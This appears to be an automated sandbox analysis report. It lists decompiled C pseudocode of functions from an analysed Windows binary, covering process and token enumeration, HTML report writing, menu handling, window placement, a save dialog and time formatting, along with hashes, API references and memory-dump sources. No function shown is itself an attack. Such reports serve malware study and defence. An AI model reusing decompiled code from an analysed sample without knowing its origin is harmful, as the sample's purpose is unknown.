                                                                                                                    • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                    • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                    • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                    • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                    0x0040598b
                                                                                                                    0x0040598b
                                                                                                                    0x0040599a
                                                                                                                    0x004059ae
                                                                                                                    0x004059b5
                                                                                                                    0x004059c1
                                                                                                                    0x004059c6
                                                                                                                    0x004059cb
                                                                                                                    0x004059ce
                                                                                                                    0x00405a7b
                                                                                                                    0x00405a7b
                                                                                                                    0x004059d4
                                                                                                                    0x004059d4
                                                                                                                    0x004059dc
                                                                                                                    0x004059ee
                                                                                                                    0x00000000
                                                                                                                    0x004059f0
                                                                                                                    0x004059f0
                                                                                                                    0x004059f6
                                                                                                                    0x004059f7
                                                                                                                    0x004059fa
                                                                                                                    0x00405a03
                                                                                                                    0x00405a2b
                                                                                                                    0x00405a2e
                                                                                                                    0x00405a3c
                                                                                                                    0x00405a40
                                                                                                                    0x00000000
                                                                                                                    0x00405a42
                                                                                                                    0x00405a42
                                                                                                                    0x00405a54
                                                                                                                    0x00405a59
                                                                                                                    0x00405a5a
                                                                                                                    0x00405a5a
                                                                                                                    0x00405a61
                                                                                                                    0x00405a69
                                                                                                                    0x00405a7f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405a69
                                                                                                                    0x00405a05
                                                                                                                    0x00405a0e
                                                                                                                    0x00405a17
                                                                                                                    0x00000000
                                                                                                                    0x00405a19
                                                                                                                    0x00405a19
                                                                                                                    0x00405a1c
                                                                                                                    0x00405a1d
                                                                                                                    0x00405a20
                                                                                                                    0x00405a29
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405a29
                                                                                                                    0x00405a17
                                                                                                                    0x00405a03
                                                                                                                    0x00000000
                                                                                                                    0x00405a6b
                                                                                                                    0x00405a6e
                                                                                                                    0x00405a72
                                                                                                                    0x00405a72
                                                                                                                    0x00000000
                                                                                                                    0x004059d4
                                                                                                                    0x00405a81
                                                                                                                    0x00405a84
                                                                                                                    0x00405a8f

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004059B5
                                                                                                                      • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                      • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                      • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                      • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                      • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                      • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                      • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                      • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                      • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                      • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                      • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                      • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                    • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                    • wcschr.MSVCRT ref: 00405A0E
                                                                                                                    • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                    • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 768606695-0
                                                                                                                    • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                    • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                    • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                    • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                    0x00407639
                                                                                                                    0x00407646
                                                                                                                    0x00407647
                                                                                                                    0x00407654
                                                                                                                    0x0040765f
                                                                                                                    0x0040765f
                                                                                                                    0x0040766b
                                                                                                                    0x0040766d
                                                                                                                    0x00407672
                                                                                                                    0x00407677
                                                                                                                    0x0040767d
                                                                                                                    0x00407680
                                                                                                                    0x00407686
                                                                                                                    0x00407691
                                                                                                                    0x00407697
                                                                                                                    0x00407699
                                                                                                                    0x00407699
                                                                                                                    0x0040769c
                                                                                                                    0x0040769f
                                                                                                                    0x004076a3
                                                                                                                    0x004076a7
                                                                                                                    0x004076ab
                                                                                                                    0x004076b5
                                                                                                                    0x004076be
                                                                                                                    0x004076c8
                                                                                                                    0x004076de
                                                                                                                    0x004076ee
                                                                                                                    0x004076f1
                                                                                                                    0x004076f4
                                                                                                                    0x004076fa
                                                                                                                    0x00407708
                                                                                                                    0x0040770e
                                                                                                                    0x00407718
                                                                                                                    0x0040771d
                                                                                                                    0x00407723
                                                                                                                    0x00407724
                                                                                                                    0x00407727
                                                                                                                    0x0040772c
                                                                                                                    0x0040772f
                                                                                                                    0x00407734
                                                                                                                    0x0040773f
                                                                                                                    0x00407744
                                                                                                                    0x00407745
                                                                                                                    0x0040767d
                                                                                                                    0x00407760

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                    • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                    • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                    • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                    • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 42%
                                                                                                                    			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                    0x0040605e
                                                                                                                    0x00406061
                                                                                                                    0x00406069
                                                                                                                    0x00406074
                                                                                                                    0x0040607a
                                                                                                                    0x0040607e
                                                                                                                    0x00406082
                                                                                                                    0x00406148
                                                                                                                    0x0040614e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406088
                                                                                                                    0x00406088
                                                                                                                    0x00406093
                                                                                                                    0x00406098
                                                                                                                    0x0040609f
                                                                                                                    0x004060ae
                                                                                                                    0x004060b6
                                                                                                                    0x004060be
                                                                                                                    0x004060c6
                                                                                                                    0x004060ca
                                                                                                                    0x004060cf
                                                                                                                    0x004060d7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060de
                                                                                                                    0x00406129
                                                                                                                    0x00406129
                                                                                                                    0x0040612d
                                                                                                                    0x0040612f
                                                                                                                    0x00406130
                                                                                                                    0x00406134
                                                                                                                    0x00406137
                                                                                                                    0x0040613c
                                                                                                                    0x0040613c
                                                                                                                    0x00000000
                                                                                                                    0x0040612d
                                                                                                                    0x004060e7
                                                                                                                    0x004060f0
                                                                                                                    0x004060f2
                                                                                                                    0x004060f2
                                                                                                                    0x004060f9
                                                                                                                    0x004060fd
                                                                                                                    0x00406102
                                                                                                                    0x0040610c
                                                                                                                    0x00406112
                                                                                                                    0x00406117
                                                                                                                    0x00406117
                                                                                                                    0x00406104
                                                                                                                    0x00406104
                                                                                                                    0x00406104
                                                                                                                    0x00406104
                                                                                                                    0x00406102
                                                                                                                    0x00406122
                                                                                                                    0x00406128
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x0040613f
                                                                                                                    0x00406140
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                    • String ID: 0$6
                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                    • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                    • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                    • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                    • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                    0x00402bee
                                                                                                                    0x00402bf8
                                                                                                                    0x00402cae
                                                                                                                    0x00402c08
                                                                                                                    0x00402c10
                                                                                                                    0x00402c11
                                                                                                                    0x00402c12
                                                                                                                    0x00402c13
                                                                                                                    0x00402c20
                                                                                                                    0x00402c27
                                                                                                                    0x00402c2e
                                                                                                                    0x00402c30
                                                                                                                    0x00402c37
                                                                                                                    0x00402c4b
                                                                                                                    0x00402c50
                                                                                                                    0x00402c53
                                                                                                                    0x00402c55
                                                                                                                    0x00402c3e
                                                                                                                    0x00402c3e
                                                                                                                    0x00402c41
                                                                                                                    0x00402c41
                                                                                                                    0x00402c5a
                                                                                                                    0x00402c60
                                                                                                                    0x00402c65
                                                                                                                    0x00402c68
                                                                                                                    0x00402c6d
                                                                                                                    0x00402c77
                                                                                                                    0x00402c7c
                                                                                                                    0x00402c7e
                                                                                                                    0x00402c87
                                                                                                                    0x00402ca5
                                                                                                                    0x00402ca5
                                                                                                                    0x00402c87
                                                                                                                    0x00402c7c
                                                                                                                    0x00402c6d
                                                                                                                    0x00000000
                                                                                                                    0x00402cac

                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                    • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsSystem$Window
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1155976603-0
                                                                                                                    • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                    • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                    • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                    • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                    0x004036ef
                                                                                                                    0x004036f6
                                                                                                                    0x0040370b
                                                                                                                    0x00403712
                                                                                                                    0x00403717
                                                                                                                    0x0040371c
                                                                                                                    0x0040371f
                                                                                                                    0x0040372c
                                                                                                                    0x00403735
                                                                                                                    0x00403738
                                                                                                                    0x00403744
                                                                                                                    0x00403751
                                                                                                                    0x00403758
                                                                                                                    0x00403760
                                                                                                                    0x00403769
                                                                                                                    0x0040376c
                                                                                                                    0x00403778
                                                                                                                    0x0040377b
                                                                                                                    0x0040378b
                                                                                                                    0x00403792
                                                                                                                    0x00403795
                                                                                                                    0x00403798
                                                                                                                    0x0040379b
                                                                                                                    0x004037a2
                                                                                                                    0x004037a5
                                                                                                                    0x004037a8
                                                                                                                    0x004037af
                                                                                                                    0x004037b7
                                                                                                                    0x004037c3
                                                                                                                    0x00000000
                                                                                                                    0x004037d4
                                                                                                                    0x004037dc

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004036F6
                                                                                                                    • memset.MSVCRT ref: 00403712
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                      • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                      • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                      • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                      • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                      • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                      • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                      • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                      • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                    • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                    • wcscpy.MSVCRT ref: 004037C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                    • String ID: L$cfg
                                                                                                                    • API String ID: 275899518-3734058911
                                                                                                                    • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                    • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                    • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                    • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                    0x00404ed0
                                                                                                                    0x00404edf
                                                                                                                    0x00404ef6
                                                                                                                    0x00000000
                                                                                                                    0x00404f00
                                                                                                                    0x00404f1c
                                                                                                                    0x00404f31
                                                                                                                    0x00404f41
                                                                                                                    0x00404f4e
                                                                                                                    0x00404f5d
                                                                                                                    0x00404f66
                                                                                                                    0x00404f69
                                                                                                                    0x00404f69
                                                                                                                    0x00404f71
                                                                                                                    0x00404f77
                                                                                                                    0x00404f7d

                                                                                                                    APIs
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
